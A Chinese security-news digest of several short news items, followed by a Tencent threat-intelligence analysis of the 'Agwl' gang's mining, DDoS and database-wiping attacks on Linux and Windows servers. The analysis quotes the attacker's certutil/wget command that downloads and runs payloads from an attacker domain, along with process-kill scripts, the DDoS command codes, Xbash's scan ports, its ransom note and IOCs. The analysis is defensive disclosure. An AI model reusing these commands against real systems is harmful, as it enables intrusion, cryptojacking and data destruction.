标签: 网络安全

美国网络受害者地图:阿拉斯加州受害者最多 加州总损失最大

每个人都可能经历过账号被盗、个人隐私被窃取等伤害,成为网络攻击、恶意软件、勒索软件的受害者。在对基于互联网犯罪投诉中心的FBI年度报告进行分析之后,CenturyLinkQuote绘制了2018年美国每个州的网络受害者数量和损失金额程度。 根据地图显示,阿拉斯加州成为网络受害者数量最多的州,在每1万名居民中就有21.67位网络受害者,而且每位受害者的损失金额高达2256.30美元,使其连续第二年成为受害最严重的州。而网络受害者数量最少的州今年依然是南卡罗来纳州,每万人受害者数量仅为5.3人,整个州全年的网络损失为1.37亿美元。 尽管南卡罗来纳州的总损失已经很高了,但是美国加利福尼亚州总损失金额最大。在2018年美国加州因网络诈骗、恶意软件等网络攻击损失了4.5亿美元,平均每位受害者损失9178.70美元。纽约州以2.07亿美元位居第二,平均每位受害者损失11426.29美元。 在受害方式方面,社交网络是2018年比较流行的攻击方式,41000名受害者因此造成1.01亿美元的损失。而虚拟货币骗局让36000名受害者损失了1.82亿美元。不出所料,60岁以上的人是诈骗者最具针对性的年龄组。他们在2018年失去了6.5亿美元的计划,包括信任/关系欺诈。   (稿源:cnBeta,封面源自网络。)

微软、谷歌和 BAT 等巨头成立机密计算联盟,联手保护数据安全

微软近日在其开源博客中宣布加入机密计算联盟(Confidential Computing Consortium,简称 CCC)。该组织致力于定义和加速推进机密计算的采用,并将托管在 Linux 基金会。联盟创始成员还包括阿里巴巴、Arm、百度、谷歌、IBM、英特尔、红帽、瑞士电信和腾讯等科技公司,它提供了一个让行业聚集起来的机会,以促进使用机密计算来更好地保护数据。 建立机密计算联盟的需求源于这样一个事实:随着计算从内部部署转移到公共云和边缘,对数据的保护变得更加复杂。当前的数据保护通常作用于静态(存储)或(网络)传输状态的数据。但是当数据正在被使用时,仍然存在风险,这也是数据保护中最具挑战性的一个步骤。 因此,机密计算将侧重于保护使用中的数据,并为敏感数据提供完全加密的生命周期。它将在内存中处理加密数据,而不会将其暴露给系统的其余部分,并减少敏感数据的暴露,为用户提供更好的控制和透明度。 “保护使用中的数据意味着数据在计算过程中不会以未加密的形式显示,得到访问授权的数据除外”,微软 Azure 首席技术官 Mark Russinovich 表示,“也就是说甚至连公共云服务提供商或边缘设备供应商都可能无法访问它,数据将完全处于私密状态。” 机密计算功能可以做到协作共享数据——例如训练多方数据集机器学习模型、对多方数据集执行分析,或是在数据库引擎中启用机密查询处理——但同时无需对这些数据进行直接访问。 目前,联盟成员已经为机密计算做出了一些开源贡献,包括: 英特尔®软件保护扩展(英特尔®SGX)软件开发套件,旨在帮助开发人员使用受保护的代码和数据,避免数据在硬件层被泄露或修改。 微软 Open Enclave SDK,这个开源框架创建了一种可插入的通用方法来创建可再发行的可信应用程序,以保护正在使用的数据。 红帽 Enarx,为可信执行环境(TEE)提供平台抽象,支持创建和运行“私有、可替换、无服务器”的应用程序。 Linux 基金会执行董事 Jim Zemlin 表示,现有的联盟只是一个开始,后续将会有更多企业加入。   (稿源:开源中国,封面源自网络。)

Google 和 Mozilla 正设法阻止哈萨克斯坦 ISP 强制安装证书行为

Google和Mozilla正在采取行动反对哈萨克斯坦政府对其本国公民开展基于证书的监视行动。两家公司今天宣布,他们正在联手在浏览器中阻止哈萨克斯坦政府上个月颁发的根证书,该证书允许它监控任何安装它的用户的加密互联网活动。政府要求该国ISP合作,强制所有客户安装证书以获得互联网访问权限。 根据密歇根大学发表的一项研究报告表明,它允许哈萨克斯坦政府对包括Facebook,Twitter,谷歌等37个域名的HTTPS连接进行“中间人”或MitM攻击。 通常,HTTPS网站的加密方式会让包含ISP在内的第三方无法访问它。就哈萨克斯坦而言,MitM攻击打破了这些网站的加密机制,允许自由监视私人互联网活动。 在行动完成后,最为流行的Chrome和Firefox浏览器都会禁止非法证书。 Mozilla将使用OneCRL阻止哈萨克斯坦的根证书,自2015年以来,Firefox一直用它来撤销证书。之前,在哈萨克斯坦访问互联网的用户的智能手机或计算机上会收到一条消息,要求他们安装根证书。 现在,当Firefox在哈萨克斯坦检测到证书时,它将阻止连接并显示错误消息。 Chrome也会阻止该证书,此外,它还将这一规则添加到Chromium源代码中的阻止列表中,并在将来包含在其他基于Chromium的浏览器中。 由于哈萨克斯坦几周前停止要求用户安装证书,现在看来,此举似乎是不必要的。据路透社报道,哈萨克斯坦政府本月早些时候在面临法律挑战后停止了其监控证书的部署,原因是一批哈萨克斯坦律师起诉该国三家移动运营商限制互联网接入。哈萨克斯坦国家安全委员会作出回应,他们发布了一份声明,称证书推出是一项“测试”,现已完成。 Mozilla承认该公司已经知道哈萨克斯坦结束了这项测试。但是,如果安装了证书,用户仍可能容易受到攻击。 “虽然政府的测试显然已经结束,但它可以用来监视网络流量的机制仍然存在。而且一些用户可能仍然安装了这个恶意证书。这些用户仍然很脆弱,即使攻击没有持续,我们也没有等待漏洞被再次利用,将设法直接解决它。” Mozilla还表示将继续监督哈萨克斯坦政府的行动,并将在未来签发类似证书时采取再次行动。   (稿源:cnBeta,封面源自网络。)

美国一些选举系统被指连上网络 存在被攻击风险

据外媒报道,安全研究人员发现,美国10个州的35个后端选举系统在过去一年的某个时候都已经连接到互联网上,这意味着它们面临着被黑客攻击或遭篡改的风险。另外研究人员还发现,选举系统的防火墙可能配置不当或不安全。 据悉,这些州使用的选举系统由美国最大的投票机公司Election Systems & Software(以下简称ES&S)开发。ES&S曾在最新的这次研究告诉媒体,这些系统不会连接公共互联网。然而就在研究结果公布后没不久,研究人员提到的一些网站被撤下,这也表明了研究人员得出的结论是有效的。 实际上,这并不是对ES&S的安全措施第一次提出担忧:去年,这家公司披露,他们在2000年至2006年期间在一些投票机上安装了远程访问软件。虽然报告中没有提供表明该系统或投票记录被操纵的证据,但这些未披露的漏洞仍旧引发了人们对美国投票系统安全性的质疑。 此外,这家公司出售的许多新投票机都没有跟上打击选举干预所需的严格安全措施。美联社最近的一篇报道指出,宾夕法尼亚州使用的许多新选举系统包括ES&S开发的系统都还在运行Windows 7系统。而我们知道,从明年年初开始,Windows 7将不再获得补丁或技术支持,届时微软将要求对更新需求收费。   (稿源:cnBeta,封面源自网络。)

Agwl 病毒团伙对 Linux 系统的三连击:挖矿、DDoS、删库勒索

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/wCjKwENZajw1vA9dmdgftQ   腾讯安全御见威胁情报中心监测到“Agwl”团伙在近期的入侵行动将Linux系统纳入攻击范围。 一、背景 腾讯安全御见威胁情报中心监测到“Agwl”团伙在近期的入侵行动将Linux系统纳入攻击范围。“Agwl”团伙于2018年7月被御见威胁情报中心发现,其攻击特点为探测phpStudy搭建的网站,并针对其网站搭建时使用的默认的MySQL弱口令进行爆破登录,从而植入挖矿以及远控木马。 该团伙早期入侵后植入的都是基于Windows平台的木马,其挖矿木马部分会首选清除其他挖矿程序、阻止其他挖矿木马访问矿池、独享系统资源。而最近的更新中,我们监测发现,“Agwl”团伙增加了对Linux系统的攻击,入侵成功后加入基于Linux系统执行的bash脚本代码s667。该脚本运行后会添加自身到定时任务,并进一步下载Linux平台下的CPU挖矿木马bashf和GPU挖矿木马bashg。 然而此时攻击并没有结束,“Agwl”团伙会继续植入Linux平台的DDoS病毒lst(有国外研究者命名为“Mayday”)以及勒索蠕虫病毒Xbash。Xbash勒索病毒会从C2服务器读取攻击IP地址段,扫描这些网络中的VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin服务器进行爆破攻击,爆破登录成功后不像其他勒索病毒那样去加密数据再勒索酬金,而是直接将数据库文件删除后骗取酬金,企业一旦中招将会遭受严重损失。 “Agwl”团伙攻击流程 二、详细分析 中招主机通过phpStudy一键部署PHP环境,默认情况下包含phpinfo及phpMyAdmin并且任何人都可以访问,同时安装的MySQL默认口令为弱口令密码并且开启在外网3306端口。在未设置安全组或者安全组为放通全端口的情况下,受到攻击者对于phpStudy的针对性探测,并且暴露了其MySQL弱口令。攻击者使用MySQL弱口令登录后,在web目录下执行Shell,并在其中添加植入挖矿木马的恶意代码。 入侵后执行shell命令为: cmd.exe /c “certutil.exe -urlcache -split -f http://wk.skjsl.com:93/Down.exe &Down.exe &del Down.exe&cd /tmp &&wget http://wk.skjsl.com:93/s667 &chmod 777 s667&./s667 “Agwl”团伙对Windows平台植入的木马为Down.exe,针对Linux平台植入的是s667。 Down.exe Down.exe为自解压程序,解压后释放一个hosts文件和7个BAT文件。根据解压命令,文件被释放到C:\Windows\debug\SYSTEM 目录下,首先被执行的是start.bat Start.bat主要功能为: 创建目录C:\ProgramData\Microsoft\test并设置为隐藏,将down.bat、open.bat、skycmd.bat拷贝到该目录中并安装为计划任务反复执行,对应的计划任务名分别为“SYSTEM”、“DNS”、“skycmd”;然后从www[.]kuaishounew.com下载wget.exe作为后续下载工具;最后启动start2.bat。 Start2.bat的功能为: 利用start.bat中下载的wget.exe从微软官方下载vc_redist.x64.exe,从www[.]kuaishounew.com下载unzip.exe(后续用到的解压工具)和hook.exe,然后执行install3.bat。 (vcredist_x64.exe是微软的Visual C运行时库,安装后能够在未安装VC的电脑上运行由 Visual C++开发的64位应用,该模块被下载以保证64位木马正常运行。) Install3.bat主要用于木马的三个服务“SYSTEM”、“DNS”、“skycmd”的安装和保持。 1、服务“SYSTEM” 执行的脚本为down.bat,主要功能为下载矿机程序wrsngm.zip进行挖矿,该矿机程序为开源挖矿程序xmr-stak修改而成,github地址https[:]//github.com/fireice-uk/xmr-stak。 使用矿池:wk.skjsl.com:3333 钱包:4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33 该钱包上线时间不长,查询收益目前仅获得0.7个XMR 2、服务“DNS” 对应执行的脚本为open.bat。功能为替换本地域名解析文件hosts,然后启动挖矿程序。 替换后的hosts文件将其他的矿池域名解析指向127.0.0.1,阻止其正常访问从而独占挖矿所需的计算资源。从该文件中还会将木马原来的C2地址从111.230.195.174迁移至116.206.177.144。 open.bat还会启动qc.bat来清除入侵过程中在xampp、www、phpstudy目录下载残留的EXE木马,以及badboy.php、test00.php木马。 3、服务“skycmd” 执行脚本skycmd.bat。功能为下载skycmdst.txt,重命名为skycmdst.bat并执行,目前下载该文件为网页文件,但黑客可通过后台配置动态更改下载的恶意代码。 s667 s667为入侵Linux系统后首先执行的脚本。脚本判断当前是否是root权限,如果不是则下载lower23.sh到/tmp/目录并通过nohup bash命令执行;如果是root权限则添加下载执行s667的定时任务,每5分钟执行一次,然后下载rootv23.sh到/tmp/目录并通过nohup bash命令执行。 最终下载执行的bash脚本lower23.sh或root23.sh负责植入Linux版本挖矿木马、清理竞品挖矿木马以及植入其他病毒等功能。 在function kills()中对竞品挖矿木马进行清除: 1、按照进程名匹配(包括被安全厂商多次披露的利用redis入侵挖矿的木马“ddg*”、“sourplum”、”wnTKYg”)。 pkill -f sourplum pkill wnTKYg && pkill ddg && rm -rf /tmp/ddg && rm -rf /tmp/wnTKYg pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f stratum pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f minexmr pkill -f XJnRj pkill -f NXLAi 2、按照矿池匹配,杀死连接指定矿池的进程 ps auxf|grep -v grep|grep “mine.moneropool.com”|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:8080″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:3333″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “monerohash.com”|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “/tmp/a7b104c270″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:6666″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:7777″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:443″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “stratum.f2pool.com:8888″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmrpool.eu” | awk ‘{print $2}’|xargs kill -9 3、按照端口匹配,杀死使用端口9999/5555/7777/14444进行tcp通信的进程 PORT_NUMBER=9999 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=5555 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=7777 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=14444 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 4、删除指定目录文件 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius rm -rf /tmp/index_bak rm -rf /tmp/httpd.conf rm -rf /tmp/*httpd.conf rm -rf /tmp/a7b104c270 rm -rf /tmp/httpd.conf rm -rf /tmp/conn rm -rf /tmp/conns rm -f /tmp/irq.sh rm -f /tmp/irqbalanc1 rm -f /tmp/irq 在function downloadyam()中下载Linux挖矿程序bashg(由开源GPU挖矿程序xmr-stak编译)和配置文件pools.txt;下载Linux平台CPU挖矿程序bashf(采用开源挖矿程序XMRig编译)以及配置文件名config.json。两种挖矿程序均使用与攻击Windows平台时相同的门罗币矿池和钱包。 DDoS病毒 lower23.sh在完成挖矿功能后,还会植入基于Linux的DDoS病毒lst(国外厂商命名为Mayday) lst搜集以下信息,并将其保存至结构g_statBase中: 系统版本 CPU核心数及其时钟速率 CPU负载 网络负载 创建一个新线程CThreadTaskManager :: ProcessMain(),将开始攻击和终止攻击的命令放入执行队列。在此之后,创建一个新线程CThreadHostStatus :: ProcessMain(),在此线程中,CPU和网络负载的数据每秒更新一次,如果接到请求,可以随时将数据发送到C&C服务器。 然后创建20个线程,从任务队列中读取信息,并根据读取的信息启动攻击或终止攻击。 建立与C&C的连接后,进入处理来自C&C的消息的无限循环。如果命令具有参数,则C&C则会发送另外4个字节,病毒根据接收到的不同参数执行不同类型的DDoS攻击。 执行DDoS攻击命令协议如下: 0×01 发起攻击,参数定义攻击的类型和要使用的线程数。攻击类型由一个字节定义,该字节可以取值0x80到0x84,共有5种攻击类型: 0x80 – TCP洪水攻击。 0x81 – UDP洪水攻击。 0x82 – ICMP洪水攻击。 0x83,0x84 – 两次DNS洪水攻击。两种攻击都类似于0x81,除了端口53(DNS服务的默认端口)用作目标端口。 0x02 终止攻击。 0x03 更新配置文件。 0x04 用于将当前命令的执行状态发送到C&C服务器。 勒索蠕虫 lower23.sh继续植入在基于Linux平台执行的勒索蠕虫病毒Xbash Xbash为使用PyInstaller将Python代码打包生成的ELF格式可执行程序,用于感染Linux系统。使用工具pyi-archive_viewer可提取出其中的pyc文件,然后通过反编译程序将其还原成Python代码。 Xbash会通过弱口令爆破和已知的服务器组件漏洞进行攻击,而且会删除目标系统中的数据库,在删除数据后提示勒索比特币,然而并没有发现其具有恢复数据的功能。 扫描端口: HTTP:80,8080,8888,8000,8001,8088 VNC:5900,5901,5902,5903 MySQL:3306 Memcached:11211 MySQL/MariaDB:3309,3308,3360 3306,3307,9806,1433 FTP:21 Telnet:23,2233 PostgreSQL:5432 Redis:6379,2379 ElasticSearch:9200 MongoDB:27017 RDP:3389 UPnP/SSDP:1900 NTP:123 DNS:53 SNMP:161 LDAP:389 Rexec:512 Rlogin:513 Rsh:514 Rsync:873 Oracle数据库:1521 CouchDB:5984 对于某些服务,如VNC,Rsync,MySQL,MariaDB,Memcached,PostgreSQL,MongoDB和phpMyAdmin,如果相关端口打开,则使用内置的弱用户名/密码字典进行爆破登录 爆破登录成功后对用户的数据库进行删除: 然后在数据库中创建勒索提示文本PLEASE_README_XYZ,勒索金额为0.02个比特币: Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not recived your payment,we will leak your database’, LygJdH8fN7BCk2cwwNBRWqMZqL1′,’backupsql@pm.me 三、安全建议 加固服务器,修补服务器安全漏洞,对于phpStudy一类的集成环境,在安装结束后应及时修改MySQL密码为强密码,避免被黑客探测入侵。 服务备份重要数据,并进行内网外网隔离防止重要数据丢失。检查并去除VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin等服务器使用的弱口令。 网站管理员可使用腾讯云网站管家智能防护平台(网址:https://s.tencent.com/product/wzgj/index.html),该系统具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统安全。 使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 116.206.177.144 Domain down.ctosus.ru wk.skjsl.com fk3.f3322.org sbkcbig.f3322.net URL http[:]//down.ctosus.ru/bat.exe http[:]//wk.skjsl.com:93/s667 http[:]//wk.skjsl.com:93/lowerv23.sh http[:]//wk.skjsl.com:93/rootv23.sh http[:]//wk.skjsl.com:93/xlk http[:]//wk.skjsl.com/wrsngm.zip http[:]//wk.skjsl.com/downulr.txt http[:]//wk.skjsl.com/config.sjon http[:]//wk.skjsl.com/bashf http[:]//wk.skjsl.com/bashg http[:]//wk.skjsl.com/pools.txt http[:]//wk.skjsl.com/lst http[:]//wk.skjsl.com/XbashH http[:]//wk.skjsl.com/NetSyst96.dll http[:]//www.kuaishounew.com/Down.exe http[:]//www.kuaishounew.com/apps.txt http[:]//www.kuaishounew.com/hook.exe http[:]//www.kuaishounew.com/hehe.exe http[:]//www.kuaishounew.com/office.exe http[:]//www.kuaishounew.com/hehe.exe http[:]//www.kuaishounew.com/hosts http[:]//116.206.177.144/wrsngm.zip http[:]//fk3.f3322.org/skycmdst.txt md5 51d49c455bd66c9447ad52ebdb7c526a fb9922e88f71a8265e23082b8ff3d417 cacde9b9815ad834fc4fb806594eb830 17f00668f51592c215266fdbce2e4246 40834e200ef27cc87f7b996fe5d44898 3897bdb933047f7e1fcba060b7e49b40 39ea5004a6e24b9b52349f5e56e8c742 8fdfe319255e1d939fe5f4502e55deee 13f337029bae8b4167d544961befa360 1b93e030d2d6f1cef92b2b6323ff9e9e 589ba3aac5119fc4e2682bafb699727b 82d28855a99013c70348e217c162ceb9 门罗币钱包1: 4Ak2AQiC1R4hFmvfSYRXfX6JSjR6YN9E81SRvLXRzeCefRWhSXq3SKDf8ZEFmpobNkXmgXnqA3CGKgaiAEJ2pjYi8BeQcn7 门罗币钱包2: 4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33 比特币钱包: 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 邮箱: backupsql@pm.me 参考链接 https://www.freebuf.com/column/195035.html https://www.freebuf.com/column/178753.html https://securelist.com/versatile-ddos-trojan-for-linux/64361/ https://unit42.paloaltonetworks.com/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

想要确保美 2020 总统大选的网络安全 国会剩下的时间已经不多了

2016 美国总统大选期间的种种乱象,已经深深地刻在了吃瓜群众的记忆里。而其中引发最热话题的,就是所谓的俄罗斯黑客在社交媒体上搅起的浑水。为了防止 2020 大选期间重蹈覆辙,国会已经多次呼吁携手保卫网络舆论阵地。比如上周,特别顾问 Robert Mueller 就向国会警告称:“2016 总统大选期间的事情不会一次就结果,当我们坐在这里的时候,外来的威胁还在蠢蠢欲动”。 2018 参议院结果(来自:维基百科) 今年春季,FBI 局长 Chris Wrey 亦表示:2018 中期选举,只是 2020 大选的大秀彩排。今年早些时候,国家情报总监 Dan Coats 也发出过类似的警告: 尽管人们对网络威胁的意识日渐提升,并且改善了网络防御。但几乎所有的信息、通信网络和系统,都将面来未来数年的风险。 遗憾的是,在一连串警告面前,国会的行动速度却有些跟不上。到目前为止,其仍未采取任何有意义的行动,来应对这一威胁。随着 2020 大选的临近,我们不清楚美国是否做好了比 2016 更好的准备。 一些议员提出,应以立法的方式,来帮助确保 2020 总统大选的安全,且监管应覆盖到线上政治广告、纸质选票、以及投票及的措施安全。 没想到的是,参议院多数党领袖 Mitch McConnell(R-KY),却成为了让这项议案成为法律的一个阻碍。在 Mueller 警告的第二天,民主党人有机会推翻解决这一问题的两项措施。 一是向准备 2020 大选的州授权 7.75 亿美元,并要求其追踪选票的踪迹;二是要求竞选官员报告任何外来干涉、或针对 FBI 的干扰企图 —— 然而 McConnell 将两项措施都堵死了。 除了 Mueller 的报告,参议院情报委员会上周公布了俄干涉美大选的一部分调查结果,声称全美 50 个州都成为了黑客的攻击目标,但没有证据表明其对选举结果造成了影响。 该委员会认定,俄情报部门无法删除或修改选民数据。但除了俄罗斯,伊朗也被指积极地参与到了线上虚假信息活动中,后者同样会构成安全风险。 在过去一年中,诸如 Facebook、Twitter、谷歌这样的平台,已经删除了他们确信来自伊朗、并参与欺骗行为的账户和帖子。遗憾的是,在两党警告面前,联邦政府几乎没有采取任何补救措施。   (稿源:cnBeta,封面源自网络。)

NSA 计划筹建网络安全理事会 以便与国土安全部和 FBI 更好地协作

外媒报道称,美国家安全局(NSA)正计划组建一个网络安全理事会,以帮助其与国土安全部和联邦调查局等部门更好地展开工作。据悉,NSA 希望重振其白帽任务,该网络防御部门将于今年 10 月启动。NSA 周二表示,现任局长高级顾问 Anne Neuberger 将成为该网络安全理事会的领导人。 (图自:维基百科,via Cnet) 此前,Anne Neuberger 曾担任 NSA 助理副主任、首席风险官、兼 NSA / USCyerbcom 选举安保小组负责人,该小组在 2018 年的美国中期选举期间发挥了很大的作用。 NSA 在周二的一份声明中称:“新的网络安全方法,将给予 NSA 和美国政府的主要合作伙伴以更好的定位,比如与国土安全部和联邦调查局展开的合作。此外,它可让我们更好地与客户分享信息,使之能够抵御恶意的网络活动”。 据悉,在纽约福特汉姆大学举行的国际网络安全大会上,NSA 局长 Paul M. Nakasone 发表了相关讲话,并正式宣布了这一消息。   (稿源:cnBeta,封面源自网络。)

英国欲通过加强通信安全控制来减少 5G 风险

据外媒报道,在人们对中国科技巨头公司华为参与5G供应所带来的安全风险持续感到担忧的时候,英国政府发布了一份针对该电信供应链的评估报告。报告得出的结论是,可以通过加强网络安全方面的政策和监管力度来消除人们的担忧。 英国数字大臣Jeremy Wright在议会给出的声明中表示,政府希望在对华为做出决定之前发布这份报告结论来让其国内的运营商可以为计划引入适用于所欲供应商的更严格标准做好准备。 Wright指出,该框架的基础将是对电信运营商提出一套新的《电信安全要求》,它将由Ofcom和政府监管。 另外他还表示,政府计划尽早立法进而为监管机构提供更加强大的权力以此来执行即将出台的《电信安全要求》并为政府建立更强大的国家安全保障权力。 报告显示,英国政府正在考虑对未能达到严格安全标准的运营商实施GDPR级别的惩罚。   报告还呼吁供应链内部应展开竞争并支持多样性。Wright说道:“如果我们要推动创新、降低对单个供应商的依赖风险,就需要这种竞争和多样性。”对此,政府将奉行有针对性的多元化战略、支持网络中构成安全和弹性风险的新参与者的增长。 “我们将推动支持新进入者和小公司增长的政策,”此外还呼吁安全初创企业也将注意力转向5G。 Wright还补充称,英国政府将寻求、吸引可信且成熟的企业进入英国市场,并表示充满活力和多样化的电信市场对消费者和国家安全都有好处。 此外,Wright的声明还提到,应该对英国电信构成更显著重大安全性和弹性风险的特定类型供应商的供应链采取额外控制 。不过“额外控制”听起来似乎不像是彻底禁止的委婉说法。   (稿源:cnBeta,封面源自网络。)

韩国门户 Naver 因未实行内外网分离被罚 3000 万韩元

22日,据外媒称,Naver因未履行维护电子金融交易安全的义务,被韩国金融监督局处以3000万韩元的罚款 。根据现行《电子金融交易法》和《电子金融监督规定》,为防止金融机构的信息处理系统和信息通信网络遭受黑客入侵等威胁行为,应当将连接内网的业务用系统与外网进行分离操作。 但是Naver在总部员工终端设备等内部系统没有完成内外网分离的情况下,进行了联网操作。 根据相关法律法规,金融机构等必须对直接连接信息处理系统的终端设备进行物理网络分离。然而,Naver没有将连接终端设备的通信线路和设备进行物理分离。 以此为由,韩国金融监督院决定对Naver处以3千万韩元的罚款,同时并对Naver一名在职员工和一名退休人员的违法事实进行了通报。   (稿源:cnBeta,封面源自网络。)

五角大楼希望加强网络安全队伍 为 2020 美国总统大选护航

周二的时候,国防部长提名人 Mark Esper 向参与元军事委员会表示,尽管仍有许多工作要完成,但其对于 2020 总统大选期间的网络安全充满信心:“我们坚信 2020 年的总统大选不会再受到影响,但鉴于总会有人来干扰,我们仍有许多工作要继续”。上个月的时候,一名高级情报官员在某次简报中向记者透露,2020 总统大选仍是该国网络安全的首要维护目标。 (图自:US DOD,via CyberScoop) 在讨论选举安全问题时,自 2017 年以来一直担任美国陆军部长的 Esper,特别强调了网络司令部的能力。其声称,2018 中期选举期间,该部门已经做得比以往更加出色。 此外,网络司令部已经做好了应对 2020 大选的准备。在今年春季的一次简报中,军方官员罕见地向记者透露了其正在保持密切的关注。 《华盛顿邮报》指出,2018 大选期间的另一场行动,中断了俄方对民主党全国委员会的互联网接入,但 Esper 未指明具体采取了哪些行动。 不过网络司令部和国家安全局证实,挫败俄方对美威胁的特遣部队,已于数月后获得正式提名。五年前,五角大楼获得了白宫和国会的更多授权,要求在其网络之外防御和阻断敌手。 在国会的年度国防授权法案中,议员们也对其中的措施展开了辩论,其中包括允许网络司令部和 NSA 采取新的动作。至于两个部门是否需要分工合作,Esper 尚未发表意见。 至于未来,Esper 希望美军网络司令部可以创建一支专业的军官队伍,在战术和作战层面上真正发挥相关工具的出色实力。但在防守方面,其认为政府和私企仍有些薄弱。 于是 Esper 在回应委员会的书面答复中称,政府应该向五角大楼分配更多资源,且目标是加强网络安全人员的招募。   (稿源:cnBeta,封面源自网络。)